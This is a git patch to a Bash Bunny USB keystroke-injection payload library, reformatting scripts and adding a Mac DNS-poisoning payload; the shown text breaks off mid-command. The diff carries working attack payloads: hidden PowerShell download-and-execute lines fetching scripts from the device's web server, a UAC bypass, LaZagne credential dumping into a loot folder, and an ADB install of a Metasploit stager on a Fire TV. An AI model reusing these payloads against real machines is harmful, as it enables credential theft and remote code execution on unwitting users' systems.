From 5a77792c1d2812e91305f177cf17e18780686e12 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Tue, 24 Oct 2017 20:10:17 -0400 Subject: [PATCH] Update and fix payloads (#277) * Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors --- payloads/extensions/cucumber.sh | 40 +++++------ payloads/extensions/ducky_lang.sh | 4 +- payloads/extensions/get.sh | 44 +++++++----- payloads/extensions/mac_happy.sh | 26 +++++++ payloads/extensions/requiretool.sh | 10 +-- payloads/extensions/run.sh | 11 ++- payloads/extensions/setkb.sh | 60 ++++++++-------- .../Hidden_Images/payload.txt | 15 ++-- .../Link_File_analysis/payload.txt | 7 ++ .../readme.md | 0 .../run.ps1 | 0 payloads/library/android/fireytv/payload.txt | 12 ++-- .../credentials/BruteBunny/payload.txt | 13 ++-- .../library/credentials/DumpCreds/payload.txt | 58 +++++++-------- .../library/credentials/MrRobot/payload.txt | 5 +- .../library/credentials/PasswordGrabber/e.cmd | 2 +- .../credentials/PasswordGrabber/payload.txt | 5 +- .../SudoBackdoor/cleaner/payload.txt | 2 - .../SudoBackdoor/injector/payload.txt | 2 - .../credentials/WifiGrabber/payload.txt | 10 ++- .../execution/exe_UACBypassD&E/payload.txt | 14 ++-- .../psh.txt => psh_DownloadExec/p.txt} | 0 .../execution/psh_DownloadExec/payload.txt | 40 +++++------ .../execution/psh_DownloadExec/readme.md | 6 +- .../psh.txt => psh_DownloadExecSMB/p.txt} | 1 - .../execution/psh_DownloadExecSMB/payload.txt | 60 ++++++++-------- .../execution/psh_DownloadExecSMB/readme.md | 12 ++-- .../exfiltration/BlackBackup/payload.txt | 13 ++-- .../exfiltration/FileInfoExfil/payload.txt | 43 +++++------ .../Powershell_TCP_Extractor/payload.txt | 12 ++-- .../exfiltration/ftp_exfiltrator/payload.txt | 11 ++- .../exfiltration/usb_exfiltrator/e.cmd | 13 +++- .../exfiltration/usb_exfiltrator/payload.txt | 4 +- .../general/ExecutableInstaller/payload.txt | 13 ++-- .../general/Proxy_Interceptor/payload.txt | 11 +-- .../p.ps1 | 0 .../payload.txt | 6 +- .../readme.md | 0 .../server.py | 0 .../phishing/dns_poisoning_mac/README.md | 9 +++ .../phishing/dns_poisoning_mac/payload.txt | 23 ++++++ payloads/library/prank/RickRoll/payload.txt | 71 ++++++++++--------- .../library/prank/macDesktop/macWallpaper.sh | 13 ++-- payloads/library/prank/win93/payload.txt | 1 - .../library/recon/InfoGrabber/payload.txt | 30 ++------ .../recon/Link File analysis/payload.txt | 12 ---- .../Link_File_analysis}/payload.txt | 13 ++-- .../readme.md | 0 .../run.ps1 | 0 .../library/recon/PrivEscChecker/payload.txt | 20 +++--- .../LinuxReverseShell/payload.txt | 3 + .../remote_access/NothingLess/payload.txt | 18 ++--- .../remote_access/USB_Intruder/payload.txt | 10 +-- .../Win_x64_JS_Rev_Meter/payload.txt | 1 - .../WindowsMeterpreterStaged/payload.txt | 13 ++-- .../sFTP Directory Grabber/payload.txt | 11 ++- 56 files changed, 438 insertions(+), 395 deletions(-) create mode 100644 payloads/extensions/mac_happy.sh create mode 100644 payloads/library/Incident_Response/Link_File_analysis/payload.txt rename payloads/library/Incident_Response/{Link File analysis => Link_File_analysis}/readme.md (100%) rename payloads/library/Incident_Response/{Link File analysis => Link_File_analysis}/run.ps1 (100%) rename payloads/library/execution/{psh_DownloadExecSMB/psh.txt => psh_DownloadExec/p.txt} (100%) mode change 100755 => 100644 rename payloads/library/execution/{psh_DownloadExec/psh.txt => psh_DownloadExecSMB/p.txt} (99%) mode change 100644 => 100755 rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/p.ps1 (100%) rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/payload.txt (92%) rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/readme.md (100%) rename payloads/library/general/{Windows NIC Sharing => Windows_NIC_Sharing}/server.py (100%) create mode 100644 payloads/library/phishing/dns_poisoning_mac/README.md create mode 100644 payloads/library/phishing/dns_poisoning_mac/payload.txt delete mode 100644 payloads/library/recon/Link File analysis/payload.txt rename payloads/library/{Incident_Response/Link File analysis => recon/Link_File_analysis}/payload.txt (65%) rename payloads/library/recon/{Link File analysis => Link_File_analysis}/readme.md (100%) rename payloads/library/recon/{Link File analysis => Link_File_analysis}/run.ps1 (100%) diff --git a/payloads/extensions/cucumber.sh b/payloads/extensions/cucumber.sh index e4427744..dbb73b50 100644 --- a/payloads/extensions/cucumber.sh +++ b/payloads/extensions/cucumber.sh @@ -1,25 +1,25 @@ #!/bin/bash function CUCUMBER() { - case $1 in - "ENABLE") - echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - ;; - "DISABLE") - echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - sleep 2 - echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - ;; - "PLAID") - echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null - sleep 2 - echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null - ;; - *) - LED FAIL - exit 1 - esac + case $1 in + "ENABLE") + echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + echo 0 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + ;; + "DISABLE") + echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + sleep 2 + echo ondemand | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + ;; + "PLAID") + echo 1 | tee /sys/devices/system/cpu/cpu{1..3}/online &> /dev/null + sleep 2 + echo performance | tee /sys/devices/system/cpu/cpu{0..3}/cpufreq/scaling_governor &> /dev/null + ;; + *) + LED FAIL + exit 1 + esac } -export -f CUCUMBER \ No newline at end of file +export -f CUCUMBER diff --git a/payloads/extensions/ducky_lang.sh b/payloads/extensions/ducky_lang.sh index 22b40eba..b95a9f6c 100755 --- a/payloads/extensions/ducky_lang.sh +++ b/payloads/extensions/ducky_lang.sh @@ -1,8 +1,8 @@ #!/bin/bash function DUCKY_LANG() { - [[ -z "$1" ]] && exit 1 # parameter must be set + [[ -z "$1" ]] && exit 1 # parameter must be set - export DUCKY_LANG="$1" + export DUCKY_LANG="$1" } export -f DUCKY_LANG diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 4788f584..2ef495f7 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -1,23 +1,31 @@ #!/bin/bash function GET() { - case $1 in - "TARGET_IP") - export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) - ;; - "TARGET_HOSTNAME") - export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') - ;; - "HOST_IP") - export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) - ;; - "SWITCH_POSITION") - [[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return - [[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return - [[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return - export SWITCH_POSITION="invalid" - ;; - esac + case $1 in + "TARGET_IP") + export TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) + ;; + "TARGET_HOSTNAME") + export TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//') + ;; + "HOST_IP") + export HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'}) + ;; + "SWITCH_POSITION") + [[ "$(cat /sys/class/gpio_sw/PA8/data)" == "0" ]] && export SWITCH_POSITION="switch1" && return + [[ "$(cat /sys/class/gpio_sw/PL4/data)" == "0" ]] && export SWITCH_POSITION="switch2" && return + [[ "$(cat /sys/class/gpio_sw/PL3/data)" == "0" ]] && export SWITCH_POSITION="switch3" && return + export SWITCH_POSITION="invalid" + ;; + "TARGET_OS") + ScanForOS=$(nmap -Pn -O $TARGET_IP -p1) + [[ $ScanForOS == *"Too many fingerprints"* ]] && ScanForOS=$(nmap -Pn -O --osscan-guess $TARGET_IP) + [[ $ScanForOS == *"Windows"* ]] && OSfound='WINDOWS' && return + [[ $ScanForOS == *"Linux"* ]] && OSfound='LINUX' && return + [[ $ScanForOS == *"Apple"* ]] && OSfound='MACOS' && return + export TARGET_OS='UNKNOWN' + ;; + esac } -export -f GET \ No newline at end of file +export -f GET diff --git a/payloads/extensions/mac_happy.sh b/payloads/extensions/mac_happy.sh new file mode 100644 index 00000000..2ceb581f --- /dev/null +++ b/payloads/extensions/mac_happy.sh @@ -0,0 +1,26 @@ +#!/bin/bash + +#Title: Mac_Happy +# Author: thehappydinoa +# Target: Mac +# Version: 0.1 +# +# Makes Mac happy by correctly setting pid and vid +# Use by running mac_happy ATTACKMODE HID +# + +function mac_happy() { + [[ -z "$1" ]] && exit 1 # parameter must be set + + [[ ! $1 =~ "ATTACKMODE" ]] && exit 1 # parameter must be for ATTACKMODE + + for i in $*; + do + command=$(echo $command $i) + done + + command=$(echo $command VID_0X05AC PID_0X021E) + + eval $command +} +export -f mac_happy diff --git a/payloads/extensions/requiretool.sh b/payloads/extensions/requiretool.sh index 49d21e81..ed2f435a 100755 --- a/payloads/extensions/requiretool.sh +++ b/payloads/extensions/requiretool.sh @@ -8,11 +8,11 @@ # REQUIRETOOL impacket function REQUIRETOOL() { - [[ -z "$1" ]] && exit 1 # parameter must be set + [[ -z "$1" ]] && exit 1 # parameter must be set - if [ ! -d /tools/$1/ ]; then - LED FAIL - exit 1 - fi + if [ ! -d /tools/$1/ ]; then + LED FAIL + exit 1 + fi } export -f REQUIRETOOL diff --git a/payloads/extensions/run.sh b/payloads/extensions/run.sh index 37043db2..da1e16c1 100755 --- a/payloads/extensions/run.sh +++ b/payloads/extensions/run.sh @@ -13,9 +13,9 @@ function RUN() { local os=$1 shift - + [[ -z "$os" || -z "$*" ]] && exit 1 # Both OS and Command parameter must be set - + case "$os" in WIN) QUACK GUI r @@ -37,6 +37,13 @@ function RUN() { QUACK DELAY 500 QUACK ENTER ;; + LINUX) + QUACK ALT F2 + QUACK DELAY 500 + QUACK STRING "$@" + QUACK DELAY 500 + QUACK ENTER + ;; *) # OS parameter must be one of the above exit 1 diff --git a/payloads/extensions/setkb.sh b/payloads/extensions/setkb.sh index 463f79b8..9fd4b9e6 100644 --- a/payloads/extensions/setkb.sh +++ b/payloads/extensions/setkb.sh @@ -7,45 +7,45 @@ # Examples: # SETKB START (set the keyboard layout to a US keyboard layout) # SETKB DONE (set the keyboard layout to the default keyboard determined by the OS language settings) -# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts) +# SETKB xx-XX (overwrite the keyboard layout to whatever keyboard layout you need, you will need the [lanugage].json file to run Ducky scripts) function SETKB() { - local state=$1 - shift - - [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given. - - case "$state" in - 'START') - QUACK GUI r - QUACK DELAY 500 - QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;" - QUACK ENTER - QUACK DELAY 1500 + local state=$1 + shift - ;; - 'DONE') - QUACK GUI r - QUACK DELAY 500 - QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; " - QUACK ENTER - QUACK DELAY 1500 + [[ -z "$state" ]] && exit 1 # state keyboard parameter must be given. - ;; - - *) - QUACK GUI r - QUACK DELAY 500 - QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force" - QUACK ENTER - QUACK DELAY 1500 + case "$state" in + 'START') + QUACK GUI r + QUACK DELAY 500 + QUACK STRING "powershell.exe Set-WinUserLanguageList -LanguageList en-US -force;" + QUACK ENTER + QUACK DELAY 1500 - ;; + ;; + 'DONE') + QUACK GUI r + QUACK DELAY 500 + QUACK "STRING powershell.exe \$sl=(Get-WinSystemLocale | Select -ExpandProperty Name) ; Set-WinUserLanguageList -LanguageList \$sl -force; " + QUACK ENTER + QUACK DELAY 1500 + + ;; + + *) + QUACK GUI r + QUACK DELAY 500 + QUACK "STRING powershell.exe Set-WinUserLanguageList -LanguageList $state -force" + QUACK ENTER + QUACK DELAY 1500 + + ;; - esac + esac } export -f SETKB diff --git a/payloads/library/Incident_Response/Hidden_Images/payload.txt b/payloads/library/Incident_Response/Hidden_Images/payload.txt index 2af8f84c..1dd42046 100644 --- a/payloads/library/Incident_Response/Hidden_Images/payload.txt +++ b/payloads/library/Incident_Response/Hidden_Images/payload.txt @@ -1,12 +1,7 @@ - - - -LED R B 100 +LED SETUP +GET SWITCH_POSITION ATTACKMODE HID STORAGE - -DUCKY_LANG gb -LED B -RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" -LED G FAST -#Green means good to go +LED SETUP +RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')" +LED ATTACK diff --git a/payloads/library/Incident_Response/Link_File_analysis/payload.txt b/payloads/library/Incident_Response/Link_File_analysis/payload.txt new file mode 100644 index 00000000..11e0d585 --- /dev/null +++ b/payloads/library/Incident_Response/Link_File_analysis/payload.txt @@ -0,0 +1,7 @@ +LED SETUP +ATTACKMODE HID STORAGE +GET SWITCH_POSITION + +LED SETUP +RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\run.ps1')" +LED ATTACk diff --git a/payloads/library/Incident_Response/Link File analysis/readme.md b/payloads/library/Incident_Response/Link_File_analysis/readme.md similarity index 100% rename from payloads/library/Incident_Response/Link File analysis/readme.md rename to payloads/library/Incident_Response/Link_File_analysis/readme.md diff --git a/payloads/library/Incident_Response/Link File analysis/run.ps1 b/payloads/library/Incident_Response/Link_File_analysis/run.ps1 similarity index 100% rename from payloads/library/Incident_Response/Link File analysis/run.ps1 rename to payloads/library/Incident_Response/Link_File_analysis/run.ps1 diff --git a/payloads/library/android/fireytv/payload.txt b/payloads/library/android/fireytv/payload.txt index fddf81f1..2c86ad6e 100644 --- a/payloads/library/android/fireytv/payload.txt +++ b/payloads/library/android/fireytv/payload.txt @@ -11,8 +11,13 @@ # Blue Blinking ...............Running ADB command to push payload.apk # Red Blinking.......FireTV failed to get an IP address from the Bash Bunny # Green..............Finished + +LED SETUP +GET TARGET_IP +GET SWITCH_POSITION + ATTACKMODE HID -LED R B 0 +LED ATTACK Q RIGHTARROW Q DELAY 200 Q RIGHTARROW @@ -64,12 +69,11 @@ Q DELAY 200 Q ESCAPE ATTACKMODE ECM_ETHERNET LED B 2000 -source bunny_helpers.sh if [ -z "${TARGET_IP}" ]; then - LED R 2000 + LED FAIL exit 1 fi adb connect ${TARGET_IP} adb install /root/udisk/payloads/${SWITCH_POSITION}/payload.apk adb shell "am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity" -LED G +LED FINISH diff --git a/payloads/library/credentials/BruteBunny/payload.txt b/payloads/library/credentials/BruteBunny/payload.txt index 12758b74..f91e0134 100644 --- a/payloads/library/credentials/BruteBunny/payload.txt +++ b/payloads/library/credentials/BruteBunny/payload.txt @@ -5,15 +5,14 @@ # Version: 1.0 # Category: Password Recovery # Target: Windows XP SP3+ -# +# # Description: Will attempt to bruteforce common router username/password combinations in an attempt to gain # access to the admin panel. # init -LED R B +LED SETUP -# need SWITCH_POSITION, so give it to me. please. thank you. -source bunny_helpers.sh +GET SWITCH_POSITION # set up the things to make it do stuff mkdir -p /root/udisk/BruteBunny/loot @@ -28,12 +27,12 @@ sync;sleep 1;sync ATTACKMODE HID STORAGE # wait for storage -LED R G B 100 +LED STAGE1 QUACK DELAY 6000 QUACK GUI r QUACK DELAY 100 # unleash the brute bunny -LED B 100 +LED STAGE2 QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')" QUACK ENTER sleep 10 @@ -41,4 +40,4 @@ sleep 10 # sync the stuff sync;sleep 1;sync -LED G \ No newline at end of file +LED FINISH diff --git a/payloads/library/credentials/DumpCreds/payload.txt b/payloads/library/credentials/DumpCreds/payload.txt index fb219643..38f59e59 100644 --- a/payloads/library/credentials/DumpCreds/payload.txt +++ b/payloads/library/credentials/DumpCreds/payload.txt @@ -6,23 +6,23 @@ # Build: 1004 # Category: Exfiltration # Target: Windows Windows 10 (Powershell) -# Attackmodes: HID, Ethernet +# Attackmodes: HID, Ethernet # !!! works only with Bash Bunny FW 1.1 and up !!! -# -# -# LED Status -# ----------------------- + -------------------------------------------- -# SETUP + Setup +# +# +# LED Status +# ----------------------- + -------------------------------------------- +# SETUP + Setup # FAIL + No /tools/impacket/examples/smbserver.py found -# FAIL2 + Target did not acquire IP address -# Yellow single blink + Initialization -# Yellow double blink + HID Stage -# Yellow triple blink + Wait for IP coming up -# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) -# Cyan inv quint blink + Powershell scripts running -# White fast blink + Cleanup, copy Files to /loot -# Green + Finished -# ----------------------- + -------------------------------------------- +# FAIL2 + Target did not acquire IP address +# Yellow single blink + Initialization +# Yellow double blink + HID Stage +# Yellow triple blink + Wait for IP coming up +# Cyan inv single blink + Wait for Handshake (SMBServer Coming up) +# Cyan inv quint blink + Powershell scripts running +# White fast blink + Cleanup, copy Files to /loot +# Green + Finished +# ----------------------- + -------------------------------------------- logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################" @@ -30,6 +30,7 @@ logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 # ###### Lets Start #### LED SETUP +GET SWITCH_POSITION # Some Variables SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION @@ -39,13 +40,13 @@ LOOTDIR=$SWITCHDIR/loot if [ -f $SWITCHDIR/DEBUG ];then DEBUG=1 # 1= Debug on / 0= Debug off tail -f /var/log/syslog > /tmp/log.txt & -else +else DEBUG=0 fi -mkdir -p $LOOTDIR +mkdir -p $LOOTDIR -REQUIRETOOL impacket +REQUIRETOOL impacket # remove old Handshake Files rm -f $SWITCHDIR/CON_* @@ -60,8 +61,8 @@ Q DELAY 5000 # Launch initial cmd if [ $DEBUG -eq 1 ]; then - RUN WIN cmd -else + RUN WIN cmd +else RUN WIN cmd /k mode con lines=1 cols=100 fi @@ -69,7 +70,7 @@ fi Q DELAY 1000 if [ $DEBUG -eq 1 ]; then Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs" -else +else Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs" fi Q DELAY 500 @@ -77,12 +78,12 @@ Q ENTER # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel) - -# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline -# now the second powershell command goes to the admin cmd windows. -# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. -# the second powershell command goes to the cmd Windows I open first. +# With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline +# now the second powershell command goes to the admin cmd windows. + +# With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. +# the second powershell command goes to the cmd Windows I open first. Q DELAY 1000 Q ALT j Q DELAY 500 @@ -109,7 +110,6 @@ logger -t DumpCred_2.1 "### Enter Ethernet Stage ###" # Ethernet Tage LED STAGE3 ATTACKMODE RNDIS_ETHERNET -# Source bunny_helpers.sh to get environment variables logger -t DumpCred_2.1 "### Start SMBServer ###" # Start SMB Server @@ -149,7 +149,7 @@ logger -t DumpCred_2.1 "### cleanup and copy files ###" if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then mkdir -p /root/udisk/loot/DumpCred_2.1 fi -mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 +mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 rmdir $LOOTDIR rm -f $SWITCHDIR/CON_EOF @@ -163,4 +163,4 @@ fi ATTACKMODE RNDIS_ETHERNET STORAGE sync; sleep 1; sync -LED FINISH \ No newline at end of file +LED FINISH diff --git a/payloads/library/credentials/MrRobot/payload.txt b/payloads/library/credentials/MrRobot/payload.txt index 5778984b..ec0430d9 100644 --- a/payloads/library/credentials/MrRobot/payload.txt +++ b/payloads/library/credentials/MrRobot/payload.txt @@ -14,7 +14,10 @@ # Cyan inverted double blink..Starts server to gets results # Green..............Got Creds and copied to loot folder # Red................No Creds + LED SETUP +GET SWITCH_POSITION + # Creating Loot Folders LOOTDIR=/root/udisk/loot/MrRobot mkdir -p $LOOTDIR @@ -34,7 +37,7 @@ Q DELAY 500 Q ENTER Q DELAY 1500 -LED STAGE2 +LED STAGE2 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\"" Q DELAY 300 diff --git a/payloads/library/credentials/PasswordGrabber/e.cmd b/payloads/library/credentials/PasswordGrabber/e.cmd index bcde067b..5dbc35bd 100644 --- a/payloads/library/credentials/PasswordGrabber/e.cmd +++ b/payloads/library/credentials/PasswordGrabber/e.cmd @@ -11,7 +11,7 @@ REM This executes LaZagne in the current directory and outputs the password file REM Time and Date is also added setlocal cd /d %~dp0 -%~dp0\laZagne.exe all > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" +%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt" REM These lines if you just want Passwords and no files. set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% diff --git a/payloads/library/credentials/PasswordGrabber/payload.txt b/payloads/library/credentials/PasswordGrabber/payload.txt index 78f52a56..4cc20386 100644 --- a/payloads/library/credentials/PasswordGrabber/payload.txt +++ b/payloads/library/credentials/PasswordGrabber/payload.txt @@ -6,12 +6,13 @@ # Target: Windows XP SP3+ # Props: Diggster, IMcPwn # Category: Exfiltration -# +# # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition, # which in turn executes e.cmd invisibly using i.vbs # which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny. # - +LED SETUP +GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')" diff --git a/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt b/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt index 09d63870..f93cf3db 100644 --- a/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt +++ b/payloads/library/credentials/SudoBackdoor/cleaner/payload.txt @@ -24,8 +24,6 @@ else ATTACKMODE ECM_ETHERNET HID fi -DUCKY_LANG us - GET SWITCH_POSITION GET HOST_IP diff --git a/payloads/library/credentials/SudoBackdoor/injector/payload.txt b/payloads/library/credentials/SudoBackdoor/injector/payload.txt index 8220fe05..7d259a07 100644 --- a/payloads/library/credentials/SudoBackdoor/injector/payload.txt +++ b/payloads/library/credentials/SudoBackdoor/injector/payload.txt @@ -26,8 +26,6 @@ else ATTACKMODE ECM_ETHERNET HID fi -DUCKY_LANG us - GET SWITCH_POSITION GET HOST_IP diff --git a/payloads/library/credentials/WifiGrabber/payload.txt b/payloads/library/credentials/WifiGrabber/payload.txt index e5e9158a..3c786aff 100755 --- a/payloads/library/credentials/WifiGrabber/payload.txt +++ b/payloads/library/credentials/WifiGrabber/payload.txt @@ -22,17 +22,15 @@ ATTACKMODE HID STORAGE -LED R B 200 +LED SETUP -LANGUAGE=‘us’ - -source bunny_helpers.sh +GET SWITCH_POSITION if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then QUACK ${SWITCH_POSITION}/ducky_script.txt - LED G + LED FINISH else - LED R + LED FAIL echo "Unable to load ducky_script.txt" >> /root/debuglog.txt exit 1 fi diff --git a/payloads/library/execution/exe_UACBypassD&E/payload.txt b/payloads/library/execution/exe_UACBypassD&E/payload.txt index 8631db27..0362017d 100644 --- a/payloads/library/execution/exe_UACBypassD&E/payload.txt +++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt @@ -2,21 +2,24 @@ # Author: Skiddie # Version: 1.1 # Target: Windows -# +# # Download and executes any binary executable with administrator privileges WITHOUT # prompting the user for administrator rights (aka UAC bypass/exploit) -# Please define URL and SAVEFILENAME in the a.vbs script +# Please define URL and SAVEFILENAME in the a.vbs script # Target does need internet connection # Works on Windows 7 - Windows 10 -# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges -# However from what i am aware version 7,8 and 8.1 are still effected +# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges +# However from what i am aware version 7,8 and 8.1 are still effected # Currently fastest download and execute for HID attacks to date. (with UAC bypass) #Define your bunny storage stick name DRIVER_LABEL='BashBunny' #RED means starting -LED R +LED SETUP + +#Gets File locations +GET SWITCH_POSITION #We are a keyboard ATTACKMODE HID STORAGE @@ -32,4 +35,3 @@ LED G #If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below #QUACK DELAY 4500 #shutdown 0 - diff --git a/payloads/library/execution/psh_DownloadExecSMB/psh.txt b/payloads/library/execution/psh_DownloadExec/p.txt old mode 100755 new mode 100644 similarity index 100% rename from payloads/library/execution/psh_DownloadExecSMB/psh.txt rename to payloads/library/execution/psh_DownloadExec/p.txt diff --git a/payloads/library/execution/psh_DownloadExec/payload.txt b/payloads/library/execution/psh_DownloadExec/payload.txt index e0e55353..1170f079 100644 --- a/payloads/library/execution/psh_DownloadExec/payload.txt +++ b/payloads/library/execution/psh_DownloadExec/payload.txt @@ -8,51 +8,49 @@ # Attackmodes: HID, RNDIS_ETHERNET # Firmware: >= 1.3 # -# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory -# +# Quick HID attack to retrieve and run powershell payload from BashBunny web server +# ensure p.txt (your powershell payload) exists in payload directory +# # | Attack Stage | Description | # | ------------------- | ---------------------------------------- | # | Stage 1 | Running Initial Powershell Commands | -# | Stage 3 | Delivering powershell payload | +# | Stage 2 | Delivering powershell payload | # ATTACKMODE RNDIS_ETHERNET HID LED SETUP +REQUIRETOOL gohttp GET HOST_IP GET SWITCH_POSITION -# Set working dir -PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION -SERVER_LOG=$PAYLOAD_DIR/server.log +# DEFINE DIRECTORIES +PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION} +SERVER_LOG=/tmp/server.log -# Fresh Server Log -rm -f $SERVER_LOG +# SERVER LOG +rm -f ${SERVER_LOG} -# Check for gohttp -REQUIRETOOL gohttp - -# Start web server +# START HTTP SERVER iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately -/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR > $SERVER_LOG 2>&1 & +/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 & -# Check for psh.txt -if [ ! -f $PAYLOAD_DIR/psh.txt ]; then +# CHECK FOR POWERSHELL +if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then LED FAIL2 exit 1 fi +cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp -# Attack HID +# STAGE 1 - POWERSHELL LED STAGE1 -# Attack (abbreviations to allow run execution) -RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\"" +RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient 